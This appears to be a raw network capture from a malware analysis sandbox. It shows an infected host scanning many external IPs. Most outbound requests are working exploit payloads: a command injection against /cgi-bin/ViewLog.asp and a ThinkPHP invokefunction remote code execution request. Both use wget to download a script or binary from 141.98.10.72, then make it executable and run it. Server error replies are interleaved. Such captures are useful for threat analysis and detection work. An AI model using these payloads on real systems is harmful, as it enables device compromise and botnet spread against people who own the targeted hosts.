Feb 14, 2024 09:29:56.473413944 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:59.321289062 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.953083038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:15.960851908 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:39.256103039 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:24.310848951 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
438	192.168.2.15	53956	95.245.1.223	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.437572002 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:54.714309931 CET	498	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="Protected" Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright © 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
439	192.168.2.15	50960	94.123.38.175	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.447371006 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
440	192.168.2.15	39168	95.101.181.53	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.450278044 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:54.660700083 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:54 GMT Date: Wed, 14 Feb 2024 08:29:54 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 35 62 35 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 34 26 23 34 36 3b 32 63 37 30 38 38 33 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.35b5655f.1707899394.2c70883e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
441	192.168.2.15	51244	94.120.43.117	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.450599909 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
442	192.168.2.15	36368	94.121.36.25	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.450951099 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
443	192.168.2.15	47440	95.82.223.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.453404903 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:54.713033915 CET	296	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Wed, 14 Feb 2024 08:29:54 GMT+00:00 Connection: Close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 50 65 72 73 6f 6e 61 6c 20 53 65 72 76 65 72 3c 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 70 3e 74 6f 20 62 72 6f 77 73 65 20 66 69 6c 65 20 63 6c 69 63 6b 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 30 2e 31 34 3a 38 30 2f 64 69 72 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head></head><body><center><h1>Welcome to Personal Server<h1></center><p>to browse file click <a href="http://192.168.0.14:80/dir">here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
444	192.168.2.15	44682	95.179.171.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.625058889 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:54.827162981 CET	625	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:54 GMT Content-Length: 489 Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 61 74 65 64 69 65 72 2f 66 72 70 22 3e 66 72 70 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 66 72 70 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Not Found</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>The page you requested was not found.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>The server is powered by <a href="https://github.com/fatedier/frp">frp</a>.</p><p><em>Faithfully yours, frp.</em></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
445	192.168.2.15	52876	94.110.27.44	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.637466908 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
446	192.168.2.15	49126	94.120.242.84	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.697021961 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
447	192.168.2.15	41152	85.140.44.196	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.697871923 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
448	192.168.2.15	45098	62.29.52.158	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.698153019 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
449	192.168.2.15	33192	112.74.18.106	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.963769913 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:55.310220003 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Wed, 14 Feb 2024 08:29:55 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
450	192.168.2.15	58734	95.101.16.151	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.519558907 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.736268997 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:29:56 GMT Date: Wed, 14 Feb 2024 08:29:56 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 63 37 35 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 64 33 37 62 62 63 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.8c757b5c.1707899396.d37bbc6</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
451	192.168.2.15	44014	95.101.19.63	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.521559000 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.740432978 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:29:56 GMT Date: Wed, 14 Feb 2024 08:29:56 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 65 37 35 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 64 62 35 30 39 62 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.8e757b5c.1707899396.db509b6</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
452	192.168.2.15	44132	95.217.150.108	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.522496939 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
